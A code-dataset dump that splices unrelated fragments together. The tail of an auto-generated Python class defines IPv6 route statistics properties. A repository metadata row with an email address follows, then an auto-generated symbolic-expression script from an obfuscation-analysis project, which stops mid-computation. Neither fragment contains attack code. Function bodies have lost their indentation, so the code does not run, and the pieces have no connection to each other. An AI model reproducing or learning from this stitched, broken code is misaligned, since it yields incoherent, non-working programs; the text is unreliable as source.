prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6McThr", prop)
prop = PropMeta("str", "v6McTr", "v6McTr", 44119, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 MC Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McTr", prop)
prop = PropMeta("str", "v6McTrBase", "v6McTrBase", 44118, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 MC Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McTrBase", prop)
prop = PropMeta("str", "v6TotalAvg", "v6TotalAvg", 44136, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalAvg", prop)
prop = PropMeta("str", "v6TotalBase", "v6TotalBase", 44131, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalBase", prop)
prop = PropMeta("str", "v6TotalCum", "v6TotalCum", 44132, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalCum", prop)
prop = PropMeta("str", "v6TotalLast", "v6TotalLast", 44130, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalLast", prop)
prop = PropMeta("str", "v6TotalMax", "v6TotalMax", 44135, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalMax", prop)
prop = PropMeta("str", "v6TotalMin", "v6TotalMin", 44134, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalMin", prop)
prop = PropMeta("str", "v6TotalPer", "v6TotalPer", 44133, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalPer", prop)
prop = PropMeta("str", "v6TotalRate", "v6TotalRate", 44141, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalRate", prop)
prop = PropMeta("str", "v6TotalSpct", "v6TotalSpct", 44137, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalSpct", prop)
prop = PropMeta("str", "v6TotalThr", "v6TotalThr", 44138, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6TotalThr", prop)
prop = PropMeta("str", "v6TotalTr", "v6TotalTr", 44140, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalTr", prop)
prop = PropMeta("str", "v6TotalTrBase", "v6TotalTrBase", 44139, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalTrBase", prop)
prop = PropMeta("str", "v6UcAvg", "v6UcAvg", 44157, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 UC Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcAvg", prop)
prop = PropMeta("str", "v6UcBase", "v6UcBase", 44152, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 UC Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcBase", prop)
prop = PropMeta("str", "v6UcCum", "v6UcCum", 44153, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 UC Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcCum", prop)
prop = PropMeta("str", "v6UcLast", "v6UcLast", 44151, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 UC Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcLast", prop)
prop = PropMeta("str", "v6UcMax", "v6UcMax", 44156, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 UC Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcMax", prop)
prop = PropMeta("str", "v6UcMin", "v6UcMin", 44155, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 UC Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcMin", prop)
prop = PropMeta("str", "v6UcPer", "v6UcPer", 44154, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 UC Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcPer", prop)
prop = PropMeta("str", "v6UcRate", "v6UcRate", 44162, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 UC Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcRate", prop)
prop = PropMeta("str", "v6UcSpct", "v6UcSpct", 44158, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 UC Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcSpct", prop)
prop = PropMeta("str", "v6UcThr", "v6UcThr", 44159, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 UC Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6UcThr", prop)
prop = PropMeta("str", "v6UcTr", "v6UcTr", 44161, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 UC Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcTr", prop)
prop = PropMeta("str", "v6UcTrBase", "v6UcTrBase", 44160, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 UC Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcTrBase", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
077ef840808c900b6c84ca30e5df3ad172cb241c | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample26-virt-max-merge-lenght-10.py | 80de3bb4575b535cfa9b82ef617dff0381d1648f | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 14,613 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_263 = SymVar_0
ref_278 = ref_263 # MOV operation
ref_5500 = ref_278 # MOV operation
ref_5542 = ref_5500 # MOV operation
ref_5550 = (ref_5542 >> (0x5 & 0x3F)) # SHR operation
ref_5557 = ref_5550 # MOV operation
ref_5589 = ref_5557 # MOV operation
ref_5603 = (0x1376783EF7559EA & ref_5589) # AND operation
ref_5642 = ref_5603 # MOV operation
ref_5644 = ((ref_5642 >> 56) & 0xFF) # Byte reference - MOV operation
ref_5645 = ((ref_5642 >> 48) & 0xFF) # Byte reference - MOV operation
ref_5646 = ((ref_5642 >> 40) & 0xFF) # Byte reference - MOV operation
ref_5647 = ((ref_5642 >> 32) & 0xFF) # Byte reference - MOV operation
ref_5648 = ((ref_5642 >> 24) & 0xFF) # Byte reference - MOV operation
ref_5649 = ((ref_5642 >> 16) & 0xFF) # Byte reference - MOV operation
ref_5650 = ((ref_5642 >> 8) & 0xFF) # Byte reference - MOV operation
ref_5651 = (ref_5642 & 0xFF) # Byte reference - MOV operation
ref_6499 = ref_278 # MOV operation
ref_6541 = ref_6499 # MOV operation
ref_6547 = (0x1A5612E2 | ref_6541) # OR operation
ref_6904 = ref_5642 # MOV operation
ref_6936 = ref_6904 # MOV operation
ref_6950 = (0x7063FB7 & ref_6936) # AND operation
ref_6987 = ref_6547 # MOV operation
ref_6999 = ref_6950 # MOV operation
ref_7001 = ((ref_6999 + ref_6987) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_7041 = ref_7001 # MOV operation
ref_7043 = ((ref_7041 >> 56) & 0xFF) # Byte reference - MOV operation
ref_7044 = ((ref_7041 >> 48) & 0xFF) # Byte reference - MOV operation
ref_7045 = ((ref_7041 >> 40) & 0xFF) # Byte reference - MOV operation
ref_7046 = ((ref_7041 >> 32) & 0xFF) # Byte reference - MOV operation
ref_7047 = ((ref_7041 >> 24) & 0xFF) # Byte reference - MOV operation
ref_7048 = ((ref_7041 >> 16) & 0xFF) # Byte reference - MOV operation
ref_7049 = ((ref_7041 >> 8) & 0xFF) # Byte reference - MOV operation
ref_7050 = (ref_7041 & 0xFF) # Byte reference - MOV operation
ref_7809 = ref_7041 # MOV operation
ref_7859 = ref_7809 # MOV operation
ref_7873 = (ref_7859 >> (0x3 & 0x3F)) # SHR operation
ref_8002 = ref_7873 # MOV operation
ref_8016 = (0xF & ref_8002) # AND operation
ref_8063 = ref_8016 # MOV operation
ref_8069 = (0x1 | ref_8063) # OR operation
ref_8120 = ref_8069 # MOV operation
ref_8122 = ((0x3162E74F << ((ref_8120 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_8541 = ref_7041 # MOV operation
ref_8591 = ref_8541 # MOV operation
ref_8605 = (ref_8591 >> (0x3 & 0x3F)) # SHR operation
ref_8734 = ref_8605 # MOV operation
ref_8748 = (0xF & ref_8734) # AND operation
ref_8795 = ref_8748 # MOV operation
ref_8801 = (0x1 | ref_8795) # OR operation
ref_8852 = ref_8801 # MOV operation
ref_8854 = ((0x40 - ref_8852) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_8862 = ref_8854 # MOV operation
ref_8906 = ref_8862 # MOV operation
ref_8908 = (0x3162E74F >> ((ref_8906 & 0xFF) & 0x3F)) # SHR operation
ref_8945 = ref_8122 # MOV operation
ref_8957 = ref_8908 # MOV operation
ref_8959 = (ref_8957 | ref_8945) # OR operation
ref_9014 = ref_8959 # MOV operation
ref_9028 = (ref_9014 >> (0x4 & 0x3F)) # SHR operation
ref_9157 = ref_9028 # MOV operation
ref_9171 = (0x7 & ref_9157) # AND operation
ref_9218 = ref_9171 # MOV operation
ref_9224 = (0x1 | ref_9218) # OR operation
ref_9674 = ref_278 # MOV operation
ref_9706 = ref_9674 # MOV operation
ref_9720 = ((ref_9706 - 0x2907943) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_9728 = ref_9720 # MOV operation
ref_9760 = ref_9728 # MOV operation
ref_9772 = ref_9224 # MOV operation
ref_9774 = ((ref_9760 << ((ref_9772 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_9813 = ref_9774 # MOV operation
ref_10668 = ref_278 # MOV operation
ref_10700 = ref_10668 # MOV operation
ref_10714 = ((ref_10700 - 0x3C563FC) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_10722 = ref_10714 # MOV operation
ref_10756 = ref_10722 # MOV operation
ref_11918 = ref_10756 # MOV operation
ref_12506 = ref_7041 # MOV operation
ref_12538 = ref_12506 # MOV operation
ref_12552 = (0xF & ref_12538) # AND operation
ref_12589 = ref_12552 # MOV operation
ref_12603 = ((ref_12589 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_12640 = ref_11918 # MOV operation
ref_12652 = ref_12603 # MOV operation
ref_12654 = (ref_12652 | ref_12640) # OR operation
ref_12693 = ref_12654 # MOV operation
ref_13425 = ref_9813 # MOV operation
ref_13841 = ref_12693 # MOV operation
ref_13865 = ref_13841 # MOV operation
ref_13871 = (0x1F & ref_13865) # AND operation
ref_13894 = ref_13871 # MOV operation
ref_13908 = ((ref_13894 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_14045 = ref_13425 # MOV operation
ref_14049 = ref_13908 # MOV operation
ref_14051 = (ref_14049 | ref_14045) # OR operation
ref_14090 = ref_14051 # MOV operation
ref_14716 = ref_12693 # MOV operation
ref_15304 = ref_7041 # MOV operation
ref_15336 = ref_15304 # MOV operation
ref_15350 = (0xF & ref_15336) # AND operation
ref_15387 = ref_15350 # MOV operation
ref_15401 = ((ref_15387 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_15438 = ref_14716 # MOV operation
ref_15450 = ref_15401 # MOV operation
ref_15452 = (ref_15450 | ref_15438) # OR operation
ref_15491 = ref_15452 # MOV operation
ref_16875 = ref_15491 # MOV operation
ref_17463 = ref_15491 # MOV operation
ref_17495 = ref_17463 # MOV operation
ref_17509 = (0xF & ref_17495) # AND operation
ref_17546 = ref_17509 # MOV operation
ref_17560 = ((ref_17546 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_17597 = ref_16875 # MOV operation
ref_17609 = ref_17560 # MOV operation
ref_17611 = (ref_17609 | ref_17597) # OR operation
ref_17650 = ref_17611 # MOV operation
ref_18382 = ref_14090 # MOV operation
ref_18798 = ref_17650 # MOV operation
ref_18822 = ref_18798 # MOV operation
ref_18828 = (0x1F & ref_18822) # AND operation
ref_18851 = ref_18828 # MOV operation
ref_18865 = ((ref_18851 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_19002 = ref_18382 # MOV operation
ref_19006 = ref_18865 # MOV operation
ref_19008 = (ref_19006 | ref_19002) # OR operation
ref_19047 = ref_19008 # MOV operation
ref_19049 = ((ref_19047 >> 56) & 0xFF) # Byte reference - MOV operation
ref_19050 = ((ref_19047 >> 48) & 0xFF) # Byte reference - MOV operation
ref_19051 = ((ref_19047 >> 40) & 0xFF) # Byte reference - MOV operation
ref_19052 = ((ref_19047 >> 32) & 0xFF) # Byte reference - MOV operation
ref_19053 = ((ref_19047 >> 24) & 0xFF) # Byte reference - MOV operation
ref_19054 = ((ref_19047 >> 16) & 0xFF) # Byte reference - MOV operation
ref_19055 = ((ref_19047 >> 8) & 0xFF) # Byte reference - MOV operation
ref_19056 = (ref_19047 & 0xFF) # Byte reference - MOV operation
ref_19673 = ref_17650 # MOV operation
ref_20261 = ref_17650 # MOV operation
ref_20293 = ref_20261 # MOV operation
ref_20307 = (0xF & ref_20293) # AND operation
ref_20344 = ref_20307 # MOV operation
ref_20358 = ((ref_20344 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_20395 = ref_19673 # MOV operation
ref_20407 = ref_20358 # MOV operation
ref_20409 = (ref_20407 | ref_20395) # OR operation
ref_20448 = ref_20409 # MOV operation
ref_23966 = ref_20448 # MOV operation
ref_24382 = ref_19047 # MOV operation
ref_24762 = ref_19047 # MOV operation
ref_24778 = ref_24382 # MOV operation
ref_24790 = ref_24762 # MOV operation
ref_24792 = ((ref_24790 + ref_24778) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_24816 = ref_24792 # MOV operation
ref_24830 = (0x7 & ref_24816) # AND operation
ref_24959 = ref_24830 # MOV operation
ref_24973 = ((ref_24959 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_25010 = ref_23966 # MOV operation
ref_25022 = ref_24973 # MOV operation
ref_25024 = (ref_25022 | ref_25010) # OR operation
ref_25063 = ref_25024 # MOV operation
ref_25587 = ((((ref_19049) << 8 | ref_19050) << 8 | ref_19051) << 8 | ref_19052) # MOV operation
ref_25653 = (ref_25587 & 0xFFFFFFFF) # MOV operation
ref_26279 = ((((ref_19053) << 8 | ref_19054) << 8 | ref_19055) << 8 | ref_19056) # MOV operation
ref_26893 = (ref_26279 & 0xFFFFFFFF) # MOV operation
ref_26895 = (((ref_26893 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_26896 = (((ref_26893 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_26897 = (((ref_26893 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_26898 = ((ref_26893 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_26961 = (ref_25653 & 0xFFFFFFFF) # MOV operation
ref_27595 = (ref_26961 & 0xFFFFFFFF) # MOV operation
ref_27597 = (((ref_27595 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_27598 = (((ref_27595 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_27599 = (((ref_27595 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_27600 = ((ref_27595 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_28265 = ref_5646 # MOVZX operation
ref_28283 = (ref_28265 & 0xFF) # MOVZX operation
ref_29497 = ref_5647 # MOVZX operation
ref_29515 = (ref_29497 & 0xFF) # MOVZX operation
ref_29517 = (ref_29515 & 0xFF) # Byte reference - MOV operation
ref_30191 = (ref_28283 & 0xFF) # MOVZX operation
ref_30209 = (ref_30191 & 0xFF) # MOVZX operation
ref_30211 = (ref_30209 & 0xFF) # Byte reference - MOV operation
ref_30847 = ref_5645 # MOVZX operation
ref_30865 = (ref_30847 & 0xFF) # MOVZX operation
ref_32079 = ref_5651 # MOVZX operation
ref_32097 = (ref_32079 & 0xFF) # MOVZX operation
ref_32099 = (ref_32097 & 0xFF) # Byte reference - MOV operation
ref_32773 = (ref_30865 & 0xFF) # MOVZX operation
ref_32791 = (ref_32773 & 0xFF) # MOVZX operation
ref_32793 = (ref_32791 & 0xFF) # Byte reference - MOV operation
ref_33413 = ((((ref_7047) << 8 | ref_7048) << 8 | ref_7049) << 8 | ref_7050) # MOV operation
ref_33479 = (ref_33413 & 0xFFFFFFFF) # MOV operation
ref_34105 = ((((ref_7043) << 8 | ref_7044) << 8 | ref_7045) << 8 | ref_7046) # MOV operation
ref_34719 = (ref_34105 & 0xFFFFFFFF) # MOV operation
ref_34721 = (((ref_34719 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_34722 = (((ref_34719 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_34723 = (((ref_34719 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_34724 = ((ref_34719 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_34787 = (ref_33479 & 0xFFFFFFFF) # MOV operation
ref_35421 = (ref_34787 & 0xFFFFFFFF) # MOV operation
